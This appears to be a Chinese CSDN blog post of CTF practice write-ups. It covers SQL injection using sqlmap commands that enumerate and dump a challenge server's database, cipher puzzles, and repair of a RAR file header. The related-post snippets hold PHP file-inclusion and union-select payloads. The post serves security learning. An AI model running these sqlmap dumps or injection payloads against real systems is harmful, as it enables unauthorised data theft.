CTF练习题

已于 2023-05-11 21:36:41 修改
阅读量899 收藏 3
点赞数 2
分类专栏: CTF 文章标签: 安全 web安全
于 2023-05-08 22:26:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62707591/article/details/130567486
版权

目录

一、easy_sql

1.1 题目

1.2 思路

1.3 writeup

1.3.1 探测是否存在漏洞

1.3.2 查询所有数据库

1.3.3 获取数据库的表名

1.3.4 获取表的列名

1.3.5 获取列的字段内容

二、Rabbit&Pig

2.1 题目

2.2 思路

2.3 writeup

三、变异凯撒

3.1 题目

3.2 思路

3.3 writeup

四、用中文密码呀

4.1 题目

4.2 思路

4.3 writeup

一、easy_sql

1.1 题目

1.2 思路

  • 根据题目“easy_sql"可猜测这是 sql 注入漏洞,用 sqlmap 工具获取 flag。
  • sqlmap 是一个自动化的 sql 注入工具,其主要功能是扫描,发现并利用给定的 url 的 sql注入漏洞。
  • ps:sqlmap 安装教程参考文章

1.3 writeup

可使用下面语句查看 sqlmap 的参数以及用法:

python sqlmap.py -h

这些选项可用于枚举后端数据库管理系统信息、表结构与表中的数据:

-a,--all获取所有信息
-b,--banner获取DBMS横幅
--current-user获取DBMS当前用户
--current-db获取DBMS当前数据库
--passwords枚举DBMS用户密码哈希值
--dbs枚举DBMS数据库
--tables枚举DBMS数据库表
--columns枚举DBMS数据库表列
--schema枚举DBMS模式
--dump转储DBMS数据库表条目
--dump-all转储所有DBMS数据库表条目
-D DB要枚举的DBMS数据库
-T TBL要枚举的DBMS数据库表(s)
-C COL

要枚举的DBMS数据库表列(s)

--batch 可使得选项全选 yes。

1.3.1 探测是否存在漏洞

python sqlmap.py -u "http://139.155.53.188:10103/?inject=1"

经上述探测可得存在 sql 注入漏洞,中文翻译如下:

1.3.2 查询所有数据库

python sqlmap.py -u "http://139.155.53.188:10103/?inject=1" --dbs

1.3.3 获取数据库的表名

选取任意一个数据库查询其表名:

python sqlmap.py -u "http://139.155.53.188:10103/?inject=1" -D supersqli --tables

1.3.4 获取表的列名

选取任意一个表查询其列名:

python sqlmap.py -u "http://139.155.53.188:10103/?inject=1" -D supersqli -T flag --columns

1.3.5 获取列的字段内容

经查询,该表仅有一个列,查询该列中的字段内容:

python sqlmap.py -u "http://139.155.53.188:10103/?inject=1" -D supersqli -T flag --columns -dump

即得到最终的 flag:flag{patience_is_the_key_of_life}。

二、Rabbit&Pig

2.1 题目

给了一个 pdf 文件和 txt 文本,pdf 里面是一张图片,txt 里是文本,如下所示:

2.2 思路

题目蕴含解题信息,由“Rabbit&Pig”可以猜测该题用到 rabbit 加密和猪圈加密

Rabbit 序列密码是一种基于混沌理论的加密算法,它利用了混沌系统的随机性和不可预测性来保护数据的安全性。Rabbit 序列密码的加密过程包括以下步骤:

  • 初始化:生成一个随机的 128 位密和一个随机的 64 位初始化向
  • 密钥扩展:用密钥和初始化向量生成一系列的密钥和向量,用于后续的加密和解密操作
  • 加密:将明文分成 64 位的块,使用密钥和向量进行加密,得到密文
  • 解密:使用相同的密钥和向量对密文进行解密,得到明文。

Rabbit 序列密码的安全性主要来自于混沌系统的随机性和不可预测性,使得攻击者无法通过破解算法或暴力破解的方式来获取密钥和明文。

rabbit 是一个加密算法,不能通过暴力破解,需要密钥,而猪圈加密得到的明文可能就是密钥。

2.3 writeup

打开 pdf  文件,在 wps 里编辑图片时,可以得到这是两张图片叠加在一起的,将隐藏图片拖至空白处可见其图片信息,如下图所示:

很显然这是一串猪圈密码,用猪圈密码在线解密工具进行解密:

根据 txt 文本利用 rabbit 在线解密工具进行解密:

三、变异凯撒

3.1 题目

一个 txt 文件,内容为:mrfk~Gbsx]@]`mZjt。

3.2 思路

根据题目“变异凯撒”,可以猜测这是凯撒密码,利用随波逐流工具解密,或写 python 脚本实现。

3.3 writeup

m 要对应到 f 则需移动 7 个位数,该凯撒加密的偏移量为 7,将每个字母加 7 得 flag。 

四、用中文密码呀

4.1 题目

给了一个名为 rar 的文件,用记事本打开出现乱码,用010Editer打开如下:

4.2 思路

由文件名“rar”可得这大抵是个 rar 压缩文件,但现在显示不出来,可能为文件头缺失。题目为“用中文解密啊”,所以可能过程中解密出来会有中文。

4.3 writeup

网上搜索 rar 文件格式,可以得到 1a 前面缺失了 52 61 72 21 这几个数据。

52 61 72 21 1A 07 00 //左边是低字节 ,右边是高字节,这是 RAR4.x 的签名

签名即标志着该文件是由支持 rar4.x 版本的软件压缩而成,如果使用支持 5.0 版本的压缩软件压缩,其签名可能会不同。

  • 52 61:为头部校验和(HEAD_CRC),占两个字节,每一块均从 HEAD_CRC 开始,所有的 RAR 都以 52 61 开头;
  • 72:为块类型(HEAD_TYPE),占一个字节,所有文件都如此;
  • 21 1A 为块标记(HEAD_FLAGS),占两个字节;
  • 07 00:表示块大小 ,即 52 61 72 21 1A 07 00 (标记块)共占7个字节。

将 52 61 72 21 这几个数据加到 1a 前面,重新保存为 rar.rar:

得到一串数字:205341760008258571777309,用随波逐流解密,因为题目为“用中文密码啊”,所以得到明文为中文:

双击打开文件 flag.txt 还需要密码,将上述中文复制粘贴到密码框中:

打开文本文件,里面是是 Brainfuck语言 写的文本:

用随波逐流解密得 flag 为 flag{H55_a3n_L897_U268}:

01==零壹
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF题库超详细资源合集
06-14
ctf题库 CTF 题⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问题,不需具特别强的编程能⼒,故⼊门较为容易。Web类题⽬常见的漏洞类型包括注⼊、XSS、⽂件包含、代码执⾏、上传、SSRF等。
CTF题目合集_网络安全ctf大赛题库,附详细答案
碧海朝天素
04-08 1722
/对字符串进行反转 如果是abc 那么就是 cba。X-Forwarded-For 尝试这个。将1改成2即可绕过wakeup功能。
网络安全最全100道CTF题目,收好了~(附答案)_ctf选择题(1),2024网络安全大厂面试经验
最新发布
2401_84300239的博客
05-09 728
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
5个免费练习黑客技术的网站!
2201_75362610的博客
06-18 2833
大家好,最近有小伙伴在微信上问我:有没有练习CTF的地方?
CTF题目部分解析
热门推荐
weixin_56817426的博客
05-24 1万+
一、题目一:exe逆向 二、读题 描述:我们获得了敌方某个exe文件,尝试逆向这个exe文件,获得里面的flag{字符串},以SeBaFi{}的形式提交字符串。 三、审题 找到隐藏在exe中的flag。 一、题目二:看本质 二、读题 描述:在渗透过程中,我们要透过现象,看本质。 三、审题 第一步 :打开给出的网页发现是一个扫雷游戏,但是无论选择那种难度游戏开始后都是困难。 一、题目三:apk逆向1 二、读题 找到隐藏在apk中的flag。 三、审题 Jadx打开apk,查看得到答案 flag{01
CTF Crypto 入门练习
m0_67837149的博客
08-04 4184
CTF Crypto 入门练习
ctf练习题
moon__________的博客
10-09 3534
攻防世界WEB-Challenge area -Web php include WEB-Challenge area -Web php include 代码审计可以轻松知道本题考查文件包含并且过滤的php:// 所以我们用data://伪协议来传输数据,成功执行phpinfo() http://111.200.241.244:59922/index.php?page=data://text/plain,<?php phpinfo();?> 接下来我们利用大小写测试服务器操作系统(其实上图已
CTF-入门练习题
10-30
这个“CTF-入门练习题”很可能包含了一系列这样的挑战,旨在帮助初学者提升在网络安全领域的技能。 【网络攻防】 网络攻防是CTF中的核心部分,涉及攻击者与防御者的对抗。攻击者可能试图寻找系统漏洞,进行SQL注入...
ctf网络安全攻防练习题
12-04
总的来说,这个CTF练习题融合了计算复杂性理论、隐写术、二进制分析和文件格式理解等多个网络安全领域的知识点,旨在挑战和提升参赛者的综合技能。解题过程中,耐心、细致和创新思维是至关重要的。通过这样的练习,...
符号执行angr解ctf逆向题组
12-28
在学习如何使用`angr`解决CTF逆向题时,你需要掌握以下知识点: 1. **基础逆向工程**:理解汇编语言、基本的二进制操作和函数调用约定是必要的。 2. **`angr`安装与配置**:了解如何在本地环境中安装和配置`angr`,...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
CTF例题:
qq_63489512的博客
05-21 1574
第一次参加类似于ctf的比赛赛前准备,以及赛后对题目的总结
CTFweb题库笔记(难度1)
cocoaiu的博客
08-11 8148
CTF笔记
CTF题目合集
cgygsw的博客
01-26 2519
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
在线CTF练习平台
eli的博客
03-09 5461
主要收集目前国内可访问的在线CTF平台,方便各位师傅找到练习平台。 如果遗漏了什么平台,或是哪个平台挂了,师傅们可以及时给我留言或私信。 平台名 网址 合天网安CTF CTF从入门到实践-CTF一站式学习平台-合天网安实验室 XCTF攻防世界 https://adworld.xctf.org.cn/ i春秋 (推荐) 选手训练营 - 网络安全竞赛|网络安全竞赛培训|信息安全竞赛培训-i春秋 南京邮电大学CTF https://cgctf.nuptsast..
CTF例题合集(1)
weixin_51339377的博客
08-25 6359
判断出来闭合是单引号 接下来构造完整的闭合语句 发现回显正常 说明闭合差不多成功!可以使用and 1=1 和and 1=2进行控制性测试 这里不演示。1.用burp抓包登录进入,任意输入账号(除了admin)和密码即可,注意网页对admin账户最开始做了限制,所以admin是没办法登录进去的。(修改账号提交): nctf.nuptzj.cn/web13/index.php?状态码200表示请求成功 状态码401表示未授权访问 也就是登录失败。说明有3列在这个数据库中 接下来可以开始进行数据库的注入操作。.
CTF | CTF比赛题解分享
hackzkaq的博客
10-09 7285
前言:由于此次比赛的题目较多,所以这是这个比赛的第一篇wp,共20题,先记录一下,防止忘记。里面有些题目是新手题较为简单,但也有许多有意思的题目,真的是做的过程痛不欲生,做完才感觉到酣畅淋漓,废话不多说,开写。接下来就可以定位了。1.这次显示文件是个jpg格式的图片,但是打不开,16进制编辑器打开,看到文件头出现了IHDR头,就可以想到其实是个png格式的图片,再看到文件尾,更加证实了是个png文件。4.第三张照片是最头疼的,全都是高楼,能够看到的只有广西农信,时代丽都,搜索相关位置,找到了大概区域。
我在做ctf练习题,注入?inject=1 union select 1,2,3时,回显:return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);sql注入的题目,怎么解决
01-15
在处理SQL注入问题时,可以使用正则表达式来过滤用户输入的内容,以防止恶意注入。根据提供的引用内容,可以使用preg_replace函数来过滤用户输入的内容,将其中的关键字替换为空字符串。例如,可以使用以下代码来过滤用户输入的内容: ```php $username = preg_replace('/select|union|from|where|insert|update/','',$username); ``` 这样,如果用户输入的内容中包含了select、union、from、where、insert或update等关键字,这些关键字将被替换为空字符串,从而防止SQL注入的发生。 另外,根据第二个引用内容,你提到了一个具体的SQL注入练习题。在这个练习题中,你输入的参数inject的值是"1 union select 1,2,3"。根据引用内容,可以看出这个练习题中存在一个注入点,可以通过注入语句来获取数据库中的信息。 为了解决这个注入问题,可以使用预处理语句或者参数化查询来防止SQL注入。具体的解决方法取决于你使用的编程语言和数据库。下面是一个使用PHP和MySQL的示例代码,演示如何使用预处理语句来解决SQL注入问题: ```php $inject = $_GET['inject']; $stmt = $mysqli->prepare("SELECT * FROM table_name WHERE column_name = ?"); $stmt->bind_param("s", $inject); $stmt->execute(); $result = $stmt->get_result(); while ($row = $result->fetch_assoc()) { // 处理查询结果 } $stmt->close(); ``` 在这个示例中,我们使用了预处理语句和参数绑定来执行查询,确保用户输入的内容不会被解释为SQL语句的一部分,从而防止SQL注入的发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值